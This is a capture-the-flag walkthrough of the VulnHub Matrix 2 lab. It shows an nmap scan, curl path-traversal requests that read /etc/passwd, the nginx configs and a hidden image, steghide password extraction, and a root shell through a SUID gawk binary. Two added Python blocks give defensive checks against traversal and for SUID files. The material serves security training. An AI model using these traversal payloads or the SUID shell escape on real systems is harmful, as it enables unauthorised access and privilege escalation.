You can download it here: https://www.vulnhub.com/entry/matrix-2,279/

Use nmap to do a thorough port scan.

root@kali:~# nmap -p 1-65535 -T4 -v -A 192.168.227.163
Starting Nmap 7.70 ( https://nmap.org ) at 2019-06-09 13:57 EDT
NSE: Loaded 148 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 13:57
Completed NSE at 13:57, 0.00s elapsed
Initiating NSE at 13:57
Completed NSE at 13:57, 0.00s elapsed
Initiating ARP Ping Scan at 13:57
Scanning 192.168.227.163 [1 port]
Completed ARP Ping Scan at 13:57, 0.04s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 13:57
Completed Parallel DNS resolution of 1 host. at 13:57, 0.01s elapsed
Initiating SYN Stealth Scan at 13:57
Scanning 192.168.227.163 [65535 ports]
Discovered open port 80/tcp on 192.168.227.163
Discovered open port 1337/tcp on 192.168.227.163
Discovered open port 12321/tcp on 192.168.227.163
Discovered open port 12320/tcp on 192.168.227.163
Discovered open port 12322/tcp on 192.168.227.163
Completed SYN Stealth Scan at 13:57, 5.76s elapsed (65535 total ports)
Initiating Service scan at 13:57
Scanning 5 services on 192.168.227.163
Completed Service scan at 13:58, 17.26s elapsed (5 services on 1 host)
Initiating OS detection (try #1) against 192.168.227.163
Retrying OS detection (try #2) against 192.168.227.163
Retrying OS detection (try #3) against 192.168.227.163
Retrying OS detection (try #4) against 192.168.227.163
Retrying OS detection (try #5) against 192.168.227.163
NSE: Script scanning 192.168.227.163.
Initiating NSE at 13:58
Completed NSE at 13:58, 7.28s elapsed
Initiating NSE at 13:58
Completed NSE at 13:58, 0.03s elapsed
Nmap scan report for 192.168.227.163
Host is up (0.00074s latency).
Not shown: 65530 closed ports
PORT STATE SERVICE VERSION
80/tcp open http nginx 1.10.3
| http-methods:
|_ Supported Methods: GET HEAD POST
|_http-server-header: nginx/1.10.3
|_http-title: Welcome in Matrix v2 Neo
1337/tcp open ssl/http nginx
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ Basic realm=Welcome to Matrix 2
|_http-server-header: nginx
|_http-title: 401 Authorization Required
| ssl-cert: Subject: commonName=nginx-php-fastcgi
| Subject Alternative Name: DNS:nginx-php-fastcgi
| Issuer: commonName=nginx-php-fastcgi
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2018-12-07T14:14:44
| Not valid after: 2028-12-07T14:14:44
| MD5: 2b68 58e4 d8c3 ab44 a964 46f8 e91e 8a21
|_SHA-1: 8a3a 7fd9 b876 e704 ab06 fbd5 6693 c2a1 4bca aa90
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_ http/1.1
| tls-nextprotoneg:
|_ http/1.1
12320/tcp open ssl/http ShellInABox
|_http-favicon: Unknown favicon MD5: 2AB43FA7D288987C3DBE15F0C53EE407
| http-methods:
|_ Supported Methods: GET POST OPTIONS HEAD
|_http-title: Shell In A Box
| ssl-cert: Subject: commonName=nginx-php-fastcgi
| Subject Alternative Name: DNS:nginx-php-fastcgi
| Issuer: commonName=nginx-php-fastcgi
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2018-12-07T14:14:44
| Not valid after: 2028-12-07T14:14:44
| MD5: 2b68 58e4 d8c3 ab44 a964 46f8 e91e 8a21
|_SHA-1: 8a3a 7fd9 b876 e704 ab06 fbd5 6693 c2a1 4bca aa90
|_ssl-date: TLS randomness does not represent time
12321/tcp open ssl/warehouse-sss?
| ssl-cert: Subject: commonName=nginx-php-fastcgi
| Subject Alternative Name: DNS:nginx-php-fastcgi
| Issuer: commonName=nginx-php-fastcgi
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2018-12-07T14:14:44
| Not valid after: 2028-12-07T14:14:44
| MD5: 2b68 58e4 d8c3 ab44 a964 46f8 e91e 8a21
|_SHA-1: 8a3a 7fd9 b876 e704 ab06 fbd5 6693 c2a1 4bca aa90
|_ssl-date: TLS randomness does not represent time
12322/tcp open ssl/http nginx
|_http-favicon: Unknown favicon MD5: AEE5D32B16C89DE02AF2F67F77D8C748
| http-methods:
|_ Supported Methods: GET HEAD POST
| http-robots.txt: 1 disallowed entry
|_file_view.php
|_http-server-header: nginx
|_http-title: Welcome in Matrix v2 Neo
| ssl-cert: Subject: commonName=nginx-php-fastcgi
| Subject Alternative Name: DNS:nginx-php-fastcgi
| Issuer: commonName=nginx-php-fastcgi
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2018-12-07T14:14:44
| Not valid after: 2028-12-07T14:14:44
| MD5: 2b68 58e4 d8c3 ab44 a964 46f8 e91e 8a21
|_SHA-1: 8a3a 7fd9 b876 e704 ab06 fbd5 6693 c2a1 4bca aa90
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_ http/1.1
| tls-nextprotoneg:
|_ http/1.1
MAC Address: 00:0C:29:D1:C4:15 (VMware)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.70%E=4%D=6/9%OT=80%CT=1%CU=33153%PV=Y%DS=1%DC=D%G=Y%M=000C29%TM
OS:=5CFD48C3%P=x86_64-pc-linux-gnu)SEQ(SP=FE%GCD=1%ISR=10B%TI=Z%CI=Z%II=I%T
OS:S=U)OPS(O1=M5B4NNSNW7%O2=M5B4NNSNW7%O3=M5B4NW7%O4=M5B4NNSNW7%O5=M5B4NNSN
OS:W7%O6=M5B4NNS)WIN(W1=7210%W2=7210%W3=7210%W4=7210%W5=7210%W6=7210)ECN(R=
OS:Y%DF=Y%T=40%W=7210%O=M5B4NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%R
OS:D=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%
OS:DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%
OS:O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=4
OS:0%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)

Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=254 (Good luck!)
IP ID Sequence Generation: All zeros

TRACEROUTE
HOP RTT ADDRESS
1 0.74 ms 192.168.227.163

NSE: Script Post-scanning.
Initiating NSE at 13:58
Completed NSE at 13:58, 0.00s elapsed
Initiating NSE at 13:58
Completed NSE at 13:58, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 42.78 seconds
Raw packets sent: 65646 (2.892MB) | Rcvd: 65606 (2.627MB)

Check the HTTP services (ports 80, 1337, 12320, 12322).

https://192.168.227.163:1337/ requires HTTP basic auth.


https://192.168.227.163:12320/ seems to be a browser-based SSH server (Shell In A Box).


That leaves https://192.168.227.163:12322/ and http://192.168.227.163.

Found this: https://192.168.227.163:12322/robots.txt (its single disallowed entry is file_view.php).


It seems to be an arbitrary file read, and the parameter is "file".

Tried the GET method but still got the same response.

Tried the POST method and the original response was gone. Fuzz, fuzz, fuzz:

root@kali:~# curl -d "file=/etc/passwd" -k https://192.168.227.163:12322/file_view.php
root@kali:~# curl -d "file=../etc/passwd" -k https://192.168.227.163:12322/file_view.php
root@kali:~# curl -d "file=../../etc/passwd" -k https://192.168.227.163:12322/file_view.php
root@kali:~# curl -d "file=../../../etc/passwd" -k https://192.168.227.163:12322/file_view.php
root@kali:~# curl -d "file=../../../../etc/passwd" -k https://192.168.227.163:12322/file_view.php
root@kali:~# curl -d "file=../../../../../etc/passwd" -k https://192.168.227.163:12322/file_view.php
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/bin/false
systemd-timesync:x:101:103:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:102:104:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:103:105:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:104:106:systemd Bus Proxy,,,:/run/systemd:/bin/false
mysql:x:105:107:MySQL Server,,,:/nonexistent:/bin/false
uuidd:x:106:108::/run/uuidd:/bin/false
shellinabox:x:107:109:Shell In A Box,,,:/var/lib/shellinabox:/bin/false
ntp:x:108:111::/home/ntp:/bin/false
stunnel4:x:109:113::/var/run/stunnel4:/bin/false
postfix:x:110:114::/var/spool/postfix:/bin/false
sshd:x:111:65534::/run/sshd:/usr/sbin/nologin
n30:x:1000:1000:Neo,,,:/home/n30:/bin/bash
testuser:x:1001:1001::/home/testuser:

OK, now I can read arbitrary files. I looked around and found nothing special, so I decided to take a look at the nginx configuration file.
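The file_view.php parameter above is a classic path-traversal read. As an added example (not code from the VM or from the original post), here is the containment check a hardened version of that handler needs, run against the author's probes as test input; the web root /var/www and the URL-encoded probe are assumptions, and the check also covers percent-encoded traversal, which the page's probes do not use.

```python
import posixpath
from urllib.parse import unquote

# Assumed web root; the page's nginx config uses "root /var/www/;" for port 1337.
WEB_ROOT = "/var/www"

# The author's probes against file_view.php, plus one benign path and one
# URL-encoded variant (both constructed) to show the check is not fooled by encoding.
PROBES = [
    "/etc/passwd",
    "../etc/passwd",
    "../../../../../etc/passwd",
    "../../../../..//var/www/index.php",
    "..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd",
    "4cc3ss/css/style.css",
]


def looks_like_traversal(param):
    """Detection side: True if any path segment of the (decoded) parameter is '..'."""
    return ".." in unquote(param).split("/")


def resolve_under_root(root, requested):
    """Hardened resolver: return the normalised absolute path if `requested`
    stays inside `root`, otherwise None.

    Decode once, treat the value as relative (a leading '/' must not escape
    the root), normalise away '.' and '..', then check containment on the
    normalised string. On a live filesystem also run os.path.realpath on the
    candidate, so a symlink inside the root cannot point outside it.
    """
    root = posixpath.normpath(root)
    rel = unquote(requested).lstrip("/")
    candidate = posixpath.normpath(posixpath.join(root, rel))
    if candidate == root or candidate.startswith(root + "/"):
        return candidate
    return None


def probe_table(root=WEB_ROOT, probes=PROBES):
    """Mirror the author's fuzzing loop: map each probe to what a hardened
    file_view.php would resolve it to (None means the request is refused)."""
    return {p: resolve_under_root(root, p) for p in probes}


if __name__ == "__main__":
    for probe, result in probe_table().items():
        flag = "TRAVERSAL" if looks_like_traversal(probe) else "ok"
        print(f"{probe:45} -> {result}  [{flag}]")
```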

root@kali:~# curl -d "file=../../../../../etc/nginx/nginx.conf" -k https://192.168.227.163:12322/file_view.php
user www-data;
worker_processes auto;
pid /run/nginx.pid;
include /etc/nginx/modules-enabled/*.conf;

events {
worker_connections 768;
# multi_accept on;
}

http {

##
# Basic Settings
##

sendfile on;
tcp_nopush on;
tcp_nodelay on;
keepalive_timeout 65;
types_hash_max_size 2048;
# server_tokens off;

# server_names_hash_bucket_size 64;
# server_name_in_redirect off;

include /etc/nginx/mime.types;
default_type application/octet-stream;

##
# SSL Settings
##

ssl_protocols TLSv1 TLSv1.1 TLSv1.2; # Dropping SSLv3, ref: POODLE
ssl_prefer_server_ciphers on;

##
# Logging Settings
##

access_log /var/log/nginx/access.log;
error_log /var/log/nginx/error.log;

##
# Gzip Settings
##

gzip on;
gzip_disable "msie6";

# gzip_vary on;
# gzip_proxied any;
# gzip_comp_level 6;
# gzip_buffers 16 8k;
# gzip_http_version 1.1;
# gzip_types text/plain text/css application/json application/javascript text/xml application/xml application/xml+rss text/javascript;

##
# Virtual Host Configs
##

include /etc/nginx/conf.d/*.conf;
include /etc/nginx/sites-enabled/*;
}


#mail {
# # See sample authentication script at:
# # http://wiki.nginx.org/ImapAuthenticateWithApachePhpScript
#
# # auth_http localhost/auth.php;
# # pop3_capabilities "TOP" "USER";
# # imap_capabilities "IMAP4rev1" "UIDPLUS";
#
# server {
# listen localhost:110;
# protocol pop3;
# proxy on;
# }
#
# server {
# listen localhost:143;
# protocol imap;
# proxy on;
# }
#}

Noticed "include /etc/nginx/sites-enabled/*;", so take a look at the default site configuration.

root@kali:~# curl -d "file=../../../../../etc/nginx/sites-enabled/default" -k https://192.168.227.163:12322/file_view.php
server {
listen 0.0.0.0:80;
root /var/www/4cc3ss/;
index index.html index.php;

include /etc/nginx/include/php;
}

server {
listen 1337 ssl;
root /var/www/;
index index.html index.php;

auth_basic "Welcome to Matrix 2";
auth_basic_user_file /var/www/p4ss/.htpasswd;

fastcgi_param HTTPS on;
include /etc/nginx/include/ssl;
include /etc/nginx/include/php;
}

I could read the HTTP auth file at /var/www/p4ss/.htpasswd and try to crack it, but that could take a lot of time, so I just take a look at port 1337's main page.

root@kali:~# curl -d "file=../../../../..//var/www/index.php" -k https://192.168.227.163:12322/file_view.php
<!DOCTYPE html>
<html lang="en" >
<head>
<meta charset="UTF-8">
<title>Welcome in Matrix v2 Neo</title>

<link rel="stylesheet" href="4cc3ss/css/style.css">
</head>
<body>
<div class="stars"> <cente><h1> Welcome In Matrix v2, Mr. NEO </h1> </center> </div>
<div class="twinkling"> <center><br><br><br>
<br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/>
<h4 style="color: green; font-size: 18px;">

I'm trying to free your mind,<span style="color:red">n30</span>.<br/>
But I can only show you the door.<br/>
You're the one that has to walk through it.

</h4>
<!--img src="h1dd3n.jpg"-->
<br/><br/><br/><br/><br/><br/><br/><br/><br/><br/>
<div class="container"> <div class="text"></div> </div>
<br><br><br> <font face="Sarpanch" color="white"
|size"10" class="message">&nbsp; This is your last chance. After this, there is no turning back. You take the <font color="blue"> blue pill</font> - the story ends, you wake up in your bed and believe whatever you want to believe.<br/> You take the <font color="red">red pill</font> - you stay in Wonderland and I show you how deep the rabbit-hole goes.<br><br>
<font face="Play"> <p class="we-are"><b>And I <font color="cyan">Said
<font color="white">:</b></p> </font> <font face="Play" class="cn"> -= There is a difference between knowing the path and walking the path. =-</center> </div>
<div class="clouds">
</div>
<script src="4cc3ss/js/index.js"> </script> </body>
</html>

There is an interesting reference in an HTML comment: img src="h1dd3n.jpg".

Download it:

curl -d "file=../../../../../var/www/h1dd3n.jpg" -k https://192.168.227.163:12322/file_view.php --output test.jpg


Checked it with binwalk and exiftool but got nothing.

Tried steghide to extract hidden data. It successfully extracted n30.txt with the passphrase "n30", the username seen in /etc/passwd.

root@kali:~# steghide --extract -sf test.jpg
Enter passphrase:
wrote extracted data to "n30.txt".
root@kali:~# ls
2107 Documents hash-identifier passwords.txt Sublist3r
antsword Downloads HashPump patator Templates
asdf.py droopescan header.txt Pictures test.jpg
burp.der drupwn Music Public test.php
crackaes.py encryptsvc n30.txt put.php users.txt
crackstreamcipher.py fasttrack.txt node-v10.15.3-linux-x64 rockyou.txt Videos
ctf101-systems-security-2017 hashes.txt padBuster.pl rootCA.crt webshell
Desktop hash_extender pass.txt shell.war
root@kali:~# cat n30.txt
P4$$w0rd

I guess "P4$$w0rd" is the password for n30.

Log in to https://192.168.227.163:12320/ (the Shell In A Box instance).

Check for SUID files:

find / -user root -perm -4000 -print 2>/dev/null


OK, there is another SUID file in the list, morpheus. Check what it is.


OK, it is just gawk. Easy:

morpheus 'BEGIN {system("/bin/sh")}'

PS: I found that when running an external command from a SUID executable, invoking a root shell only works with /bin/sh and not with /bin/bash, unless setuid(0) was called beforehand. I looked it up and found that this is because /bin/bash checks the real uid of the user running it and sets the effective uid back to the real uid, so the privilege escalation fails, whereas /bin/sh has no such check. See: https://stackoverflow.com/questions/556194/calling-a-script-from-a-setuid-root-c-program-script-does-not-run-as-root

Anyway, got a root shell:

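The SUID hunt above (find the setuid files, then notice that morpheus is a renamed gawk) is exactly what a defender should run routinely. As an added example, not from the original post, this Python audit lists setuid files and flags any whose content is byte-identical to an interpreter already on the host; the baseline paths and their digests are constructed placeholders, and the interpreter list is an assumption.

```python
import hashlib
import os
import stat

# Constructed baseline of packaged setuid files; the digests are placeholders.
EXPECTED_SUID = {
    "/usr/bin/passwd": "placeholder-digest-passwd",
    "/usr/bin/sudo": "placeholder-digest-sudo",
}

def sha256_of(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:  # read in chunks so large binaries are fine
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()

def scan_suid(root):
    """Python equivalent of `find ROOT -perm -4000`: regular files with setuid set."""
    found = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            p = os.path.join(dirpath, name)
            try:
                st = os.lstat(p)
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                found.append(p)
    return sorted(found)

def interpreter_digests(paths):
    """Map content hash -> path for the interpreters present on this host."""
    return {sha256_of(p): p for p in paths if os.path.isfile(p)}

def classify_suid(path, digest, expected=EXPECTED_SUID, interpreters=None):
    """Label one setuid file: 'expected' (baseline path and hash), 'modified'
    (baseline path, changed content), 'renamed-interpreter:<path>' (same bytes
    as a shell or awk, the morpheus case) or 'unknown'."""
    interpreters = interpreters or {}
    if path in expected:
        return "expected" if expected[path] == digest else "modified"
    if digest in interpreters:
        return "renamed-interpreter:" + interpreters[digest]
    return "unknown"

def audit(root, interpreters=("/bin/sh", "/bin/bash", "/usr/bin/gawk", "/usr/bin/awk")):
    """Scan `root` and label every setuid file found there."""
    known = interpreter_digests(interpreters)
    return {p: classify_suid(p, sha256_of(p), interpreters=known) for p in scan_suid(root)}
```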